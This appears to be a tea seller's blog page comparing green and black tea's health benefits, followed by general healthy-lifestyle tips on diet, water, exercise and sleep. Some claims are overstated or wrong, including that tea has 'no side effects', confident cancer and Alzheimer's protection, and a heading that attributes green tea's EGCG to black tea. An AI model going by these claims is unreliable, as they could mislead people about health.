Over time we have made you aware of the fact that all six types of teas are made one single plant Camellia Sinensis. Despite that, each of these teas are different from each other in some respects or the other. These changes are the result of the process carried out to make tea, after they have been plucked from the tea gardens. Starting from the colour and taste to health benefits and aroma, everything depends on the way the tea has been processed.Like every other type of tea, Black Tea and Green Tea have always been known for their refreshing taste and the benefits that they have to offer. Even though they differ in taste, colour and aroma, they have a lot to offer in common. A detailed analysis can help us understand better the similarities as well as the differences between the two.

Here are a few common benefits that the two have to offer:

Protect Your Heart:

Green and Black tea both are considered rich in a group of protective antioxidants called polyphenols. Specifically, both of them contain flavonoids, a subgroup of polyphenols. However, the difference lies in the type as well as the amount of flavonoids. The flavonoids in both green and black tea help to protect your heart. A study found that drinking green and black tea can lower your blood pressure as well. It is believed that people who drink 1–3 cups per day have a 19% and 36% reduced risk of heart attack and stroke respectively. Also, drinking three cups of black tea per day could reduce the risk of heart disease to a great extent.

Boost Your Brain Function:

Green and black tea both contain caffeine, only the amount of caffeine that they contain, may differ. The amount of caffeine in green tea is less as compared to black tea, which is 35 mg per cup, compared to 39- 109 mg for the same serving.

Caffeine not only stimulates your nervous system by blocking the inhibitory neurotransmitter adenosine but also aids the release of mood-enhancing neurotransmitters such as dopamine and serotonin. Thus, caffeine can boost alertness and freshen up your mood instantly.

Green and black teas also contain the amino acid L-theanine, which is not present in coffee. Thus, these teas can be a very good replacement to coffee. There is slightly more L-theanine in green tea than black tea, though the amounts can vary considerably.

Other than this, depending upon the flavonoids and antioxidants present in them, there are some individual benefits of these two.

Green Tea Lovers also Share Love for Black Tea

Presence of EGCG in Black Tea:

Green tea is an excellent source of the potent antioxidant epigallocatechin-3-gallate which is considered the most powerful of all the anti-oxidants present in it and is responsible for many of green tea’s health benefits. Some of them are – protecting the body from Cancer cells, Alzheimer’s disease. Other than this, it will also help to protect your liver and keep your body and mind calm.

Beneficial Theaflavins in Black Tea

Theaflavins are a group of polyphenols that are unique to black tea, formed during the fermentation process. 3–6% of all polyphenols in black tea are a result of these theaflavins. Theaflavins too offer many health benefits. These polyphenols protect fat cells from damage by free radicals to support your body’s natural antioxidant production.

A study also shows that theaflavins present in black tea can lower the risk of plaque formation in blood vessels by reducing inflammation and increasing the availability of nitric oxide, which helps your blood vessels dilate. In addition, theaflavins significantly reduce cholesterol and blood sugar levels. In fact, theaflavins in black tea may have the same antioxidant capacity as polyphenols in green tea which would again give rise to some common health benefits.

Another small difference between the two is that black tea is fermented whereas green tea is not. When Black Tea is made, the leaves are first rolled and then exposed to air to trigger the fermentation process. This reaction causes the leaves to turn dark brown and allows the flavours to intensify. On the other hand, green tea is pan-fried to prevent fermentation and thus, is much lighter in colour than black tea.

Which One Should You Choose?

As discussed above, both green tea and black tea contain powerful compounds that offer a number of health benefits. From keeping your immune system healthy to promoting heart health and weight loss, they have quite a lot of benefits to offer. If you need a solution to any of these problems, then good news is that you can choose the one that suits your taste the best.

The best thing about drinking tea is that, there are no side effects so you can surely experiment with their taste by mixing them with either spices, honey or milk and make the best cup for yourself.

‘Healthy living is a long-term commitment, but taking small steps at a time can pave a way for a healthier tomorrow’.

Lifestyle means the way of life – the behavior, practices and activities of an individual or a community put to practice in their day to day life. Healthy lifestyle encompasses those practices which have a positive or beneficial effect on our health – physical, mental, or social.

Promoting a healthy style is both helpful in preventing and curing diseases, and achieving maximum health. Malnutrition, unhealthy diet, increased weight, smoking, alcohol consumption, drug abuse, physical inactivity, stress, etc., are some of the characteristics of an unhealthy lifestyle. In fact, obesity and other chronic disease like diabetes, cardio-arterial diseases, hypertension, hyperlipidemia are all called lifestyle diseases, and taking steps towards a healthier lifestyle will keep you away from all these diseases. Improving on these means improve the quality of life.

In order to achieve a health promoting lifestyle, certain behavioral modifications may be required, such as incorporating some amount of physical activity in the daily life, inclusion of certain foods and drinks which have proven health benefits, avoid smoking and drug abuse, and so on.

A healthy diet and physical activity are the two most important part of a healthy lifestyle. This would mean eating foods that are rich in antioxidants, minerals and vitamins and have fewer but healthy calories. By healthy calories it is meant that these should come from complex carbohydrates and not from fatty, fried foods or from foods giving only empty calories like sweetened sodas, fast foods with refined carbohydrates etc. Along with this, it is also important to incorporate some amount of daily physical activity.

Here are some tips that can help you make the changes required for a healthy lifestyle and keep you on track :

  1. Select foods that are both low in refined sugars and carbohydrates, minimize the consumption of sugary drinks like juices, sweetened sodas, breads or pastas made from refined flour. Instead, include whole wheat or multi grain breads, whole grain breakfast cereals like oats, wheat flakes and whole fruits.
  2. Choose foods that have a minimum amount of unhealthy fats. Foods that are baked, fried and frozen have trans fats which are not good for health. Also, avoid foods that have too many saturated fats, like red meats, pizzas and other fast foods. It is better to include fish, nuts and low fat dairy products in the daily diet.
  3. Eat a variety of whole fresh foods instead of packaged or processed foods. Avoid processed cheese, meats and juices, rather include fresh whole fruits, salads, sprouts, etc. include lots of vegetables and beans in your daily diet.
  4. Eat smaller frequent meals rather than bigger infrequent meals in order to be able to get a benefit of all nutrients. It also helps to maintain a healthy weight. Most Dieticians and Nutritionists would suggest a 6 meal pattern with 3 main meals and 3 high- fiber-nutrient- dense-low- calorie in between snacks. Make healthier snack choices, like eating fruits, nuts or salads instead of a fried in-between snacks. Also, reduce the portion size of each meal.
  5. Drink a minimum of 10 glasses of water (liquids) daily. This can include lemon water, green tea, fresh coconut water, butter milk, soups, etc. This however, does not include the daily dose of tea and coffee. In fact, Green tea has shown many great benefits when incorporated along with other lifestyle changes, in causing both weight loss and weight management, especially if consumed with lemon early in the morning.
  6. Along with all this, a regular exercise regime is also very important. The trick to making the lifestyle healthier is by making smaller healthier changes every day, like taking stairs instead of a lift, walking to someone’s desk rather than sending an e-mail, parking furthest  from the building and walking to your desk, etc.
  7. Quit smoking and other substance abuse. Addiction to such things is considered as an unhealthy lifestyle.
  8. Proper sleep and recreation are also the essential characteristics of a healthy lifestyle.

To conclude:

As per WHO’s definition, health is not mere absence of disease, but a state of total physical, mental and social wellbeing. This encompasses maintaining a healthy weight, avoidance of substance abuse, following an overall healthy regimen, making healthier food choices and including some amount of  physical activity in daily life.
